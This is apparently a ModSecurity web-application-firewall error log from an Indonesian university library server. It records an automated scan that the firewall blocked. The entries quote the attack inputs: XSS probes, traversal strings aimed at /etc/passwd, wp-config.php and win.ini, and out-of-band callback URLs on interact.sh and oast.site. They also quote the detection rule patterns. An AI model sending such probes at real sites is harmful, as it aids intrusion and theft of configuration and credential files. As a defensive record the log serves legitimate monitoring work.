"digilib.unla.ac.id"] [uri "/wp-content/plugins/navis-documentcloud/js/window.php"] [unique_id "ZO15-cCo-f0AAAolKhgAAAAe"]
[Tue Aug 29 11:54:22.643533 2023] [:error] [pid 2662] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >\\x22>< found within ARGS:page: </script>\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/sagepay-server-gateway-for-woocommerce/includes/pages/redirect.php"] [unique_id "ZO15-sCo-f0AAApmXt4AAAAp"]
[Tue Aug 29 11:54:23.559017 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/sap/bc/BSp/sap/menu/fameset.htm"] [unique_id "ZO15-8Co-f0AAApa-EMAAAAg"]
[Tue Aug 29 11:54:25.075290 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:lp-dismiss-notice. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: xxx<img found within ARGS:lp-dismiss-notice: xxx<img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16AcCo-f0AAAor7vEAAAAk"]
[Tue Aug 29 11:54:26.991949 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16AsCo-f0AAApV22AAAAAJ"]
[Tue Aug 29 11:54:27.085058 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:q: <svg/onload=alert(1)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/addons/"] [unique_id "ZO16A8Co-f0AAAqSwhYAAAAN"]
[Tue Aug 29 11:54:27.575501 2023] [:error] [pid 2657] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16A8Co-f0AAAph8w4AAAAj"]
[Tue Aug 29 11:54:29.808747 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:v. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:v: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/hero-maps-pro/views/dashboard/index.php"] [unique_id "ZO16BcCo-f0AAAo2nBMAAAAA"]
[Tue Aug 29 11:54:30.815105 2023] [:error] [pid 2715] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:what. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:\\x22\\x5c found within ARGS:what: {\\x22call_action\\x22:\\x22x\\x22,\\x22more_data\\x22:\\x22\\x5cu003cscript>alert(document.domain)\\x5cu003c/script>\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16BsCo-f0AAAqb-pwAAAAu"]
[Tue Aug 29 11:54:31.650488 2023] [:error] [pid 2713] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><img src onerror=alert(document.domain) x"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/members-list/admin/view/user.php"] [unique_id "ZO16B8Co-f0AAAqZuZAAAAAs"]
[Tue Aug 29 11:54:32.564771 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:filename: filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php"] [unique_id "ZO16CMCo-f0AAAqRzCUAAAAM"]
[Tue Aug 29 11:54:33.552977 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16CcCo-f0AAAqSwikAAAAN"]
[Tue Aug 29 11:54:34.579746 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:var_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:var_url: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/ecrire/"] [unique_id "ZO16CsCo-f0AAAqSwi4AAAAN"]
[Tue Aug 29 11:54:34.609374 2023] [:error] [pid 2645] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stack. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stack: \\x0a<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/__nuxt_error"] [unique_id "ZO16CsCo-f0AAApV23IAAAAJ"]
[Tue Aug 29 11:54:35.551095 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16C8Co-f0AAApa-E8AAAAg"]
[Tue Aug 29 11:54:35.695863 2023] [:error] [pid 2614] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/adminimize/adminimize_page.php"] [unique_id "ZO16C8Co-f0AAAo2nB4AAAAA"]
[Tue Aug 29 11:54:38.006007 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:tab. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:tab: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin.php"] [unique_id "ZO16DsCo-f0AAAofnE0AAAAX"]
[Tue Aug 29 11:54:38.692997 2023] [:error] [pid 2660] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:path: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/wp-source-control/downloadfiles/download.php"] [unique_id "ZO16DsCo-f0AAApk-WsAAAAn"]
[Tue Aug 29 11:54:40.186775 2023] [:error] [pid 2661] [client 143.42.78.27] ModSecurity: collections_remove_stale: Failed deleting collection (name "ip", key "172.28.0.1_d7f9fdf39193610aaa5fc6cb072e72086210c23b"): Internal error [hostname "digilib.unla.ac.id"] [uri "/config.inc.php-good"] [unique_id "ZO16D8Co-f0AAApl@BgAAAAo"]
[Tue Aug 29 11:54:40.545287 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:year. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:year: 2021</title><script>alert('2Ue0HImbmoU7CZyArPbLLDsM9Y5')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/cgi/cal"] [unique_id "ZO16EMCo-f0AAAor7xwAAAAk"]
[Tue Aug 29 11:54:41.612409 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:stamp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:stamp: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/KeepAlive.jsp"] [unique_id "ZO16EcCo-f0AAAqeFPwAAAAx"]
[Tue Aug 29 11:54:41.635788 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS_NAMES:javascript:alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS_NAMES:javascript:alert(document.domain): javascript:alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilib.unla.ac.id"] [uri "/help/english/index.html"] [unique_id "ZO16EcCo-f0AAAoz78gAAAAS"]
[Tue Aug 29 11:54:44.610956 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain). [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ' found within ARGS_NAMES:a' type= 'text' autofocus onfocus='alert(document.domain): a' type= 'text' autofocus onfocus='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/OneView/view/center"] [unique_id "ZO16FMCo-f0AAAqUB3sAAAAb"]
[Tue Aug 29 11:54:46.610248 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16FsCo-f0AAAolKjwAAAAe"]
[Tue Aug 29 11:54:47.611334 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:operatorlocale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:operatorlocale: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/index.jsp"] [unique_id "ZO16F8Co-f0AAAqUB4UAAAAb"]
[Tue Aug 29 11:54:50.641056 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO16GsCo-f0AAApHRZcAAAAP"]
[Tue Aug 29 11:54:50.644427 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:backurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:backurl: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/raygun4wp/sendtesterror.php"] [unique_id "ZO16GsCo-f0AAAqUB5UAAAAb"]
[Tue Aug 29 11:54:51.567666 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:xing-url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:xing-url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php"] [unique_id "ZO16G8Co-f0AAAqUB5kAAAAb"]
[Tue Aug 29 11:54:51.743176 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c found within ARGS:fileName: ..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/source/loggin/page_log_dwn_file.hsp"] [unique_id "ZO16G8Co-f0AAAqTvmMAAAAa"]
[Tue Aug 29 11:54:52.624674 2023] [:error] [pid 2711] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:formId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:formId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/tidio-form/popup-insert-help.php"] [unique_id "ZO16HMCo-f0AAAqXySwAAAAq"]
[Tue Aug 29 11:54:54.610308 2023] [:error] [pid 2710] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16HsCo-f0AAAqWwaoAAAAl"]
[Tue Aug 29 11:54:55.591630 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb0e547eibjdw1p8.oast.site found within TX:1: cjmnijtjmimvgniikdb0e547eibjdw1p8.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/plugins/servlet/oauth/users/icon-uri"] [unique_id "ZO16H8Co-f0AAAqRzF4AAAAM"]
